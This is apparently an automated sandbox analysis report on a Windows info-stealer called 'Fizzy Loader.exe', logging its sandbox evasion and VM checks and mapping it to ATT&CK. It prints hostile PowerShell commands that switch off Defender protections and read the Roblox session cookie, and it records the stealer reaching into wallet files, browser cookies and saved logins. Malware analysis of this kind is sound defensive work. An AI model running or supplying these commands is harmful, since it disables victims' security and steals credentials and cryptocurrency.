                        Source: C:\Users\user\Desktop\Fizzy Loader.exeWindow / User API: threadDelayed 5698Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeWindow / User API: threadDelayed 4119Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5729Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4058Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2518Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 917Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4805Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 912Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5433Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 659Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2285
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 928
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -597468s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -597202s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -597015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596874s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596546s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596325s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596218s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -596000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595889s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595780s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595671s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595562s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595451s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595341s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -595012s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594899s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594793s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594627s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594500s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594283s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594156s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -594015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593672s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593547s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593328s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593207s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -593093s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592982s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592873s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592538s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592297s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592187s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -592078s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591968s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591842s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591732s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591621s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591512s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591312s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -591118s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -590948s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe TID: 1476Thread sleep time: -590812s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6048Thread sleep count: 5729 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1892Thread sleep count: 4058 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep count: 2518 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep count: 917 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5880Thread sleep count: 4805 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6512Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1856Thread sleep count: 912 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep count: 5433 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020Thread sleep count: 659 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4220Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1992Thread sleep count: 2285 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3276Thread sleep count: 928 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2616Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                        Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597468Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597202Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 597015Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596874Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596765Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596656Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596546Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596437Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596325Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596218Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596109Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 596000Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595889Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595780Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595671Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595562Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595451Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595341Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595234Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595125Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 595012Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594899Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594793Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594627Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594500Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594283Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594156Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 594015Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593890Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593781Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593672Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593547Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeThread delayed: delay time: 593437Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 593328
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 593207
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 593093
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 592982
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 592873
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 592765
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 592656
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 592538
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 592422
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 592297
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 592187
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 592078
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 591968
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 591842
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 591732
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 591621
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 591512
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 591312
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 591118
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 590948
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Thread delayed: delay time: 590812
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: Fizzy Loader.exe, ukUGV.scr.0.dr Binary or memory string: vboxtray
                        Source: ukUGV.scr.0.dr Binary or memory string: vboxservice
                        Source: Fizzy Loader.exe, ukUGV.scr.0.dr Binary or memory string: qemu-ga
                        Source: ukUGV.scr.0.dr Binary or memory string: vmwareuser
                        Source: Fizzy Loader.exe, ukUGV.scr.0.dr Binary or memory string: vmusrvc
                        Source: ukUGV.scr.0.dr Binary or memory string: vmwareservice+discordtokenprotector
                        Source: ukUGV.scr.0.dr Binary or memory string: vmsrvc
                        Source: ukUGV.scr.0.dr Binary or memory string: vmtoolsd
                        Source: ukUGV.scr.0.dr Binary or memory string: vmwaretray
                        Source: Fizzy Loader.exe, 00000000.00000002.2618782970.00000172AEFA4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BA3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareservice
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe'
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe"
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pause
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Queries volume information: C:\Users\user\Desktop\Fizzy Loader.exe VolumeInformation
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File written: C:\Windows\System32\drivers\etc\hosts

                        Stealing of Sensitive Information

                        Source: Yara match File source: Fizzy Loader.exe, type: SAMPLE
                        Source: Yara match File source: 0.0.Fizzy Loader.exe.172aed80000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: Fizzy Loader.exe PID: 1708, type: MEMORYSTR
                        Source: Yara match File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, type: DROPPED
                        Source: Fizzy Loader.exe, 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Electrum
                        Source: Fizzy Loader.exe, 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore
                        Source: Fizzy Loader.exe, 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus
                        Source: Fizzy Loader.exe, 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                        Source: Fizzy Loader.exe, 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: keystore
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                        Source: Yara matchFile source: 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Fizzy Loader.exe PID: 1708, type: MEMORYSTR

                        Remote Access Functionality

Source: Yara match File source: Fizzy Loader.exe, type: SAMPLE
Source: Yara match File source: 0.0.Fizzy Loader.exe.172aed80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Fizzy Loader.exe PID: 1708, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 File and Directory Permissions Modification | 1 OS Credential Dumping | 22 System Information Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
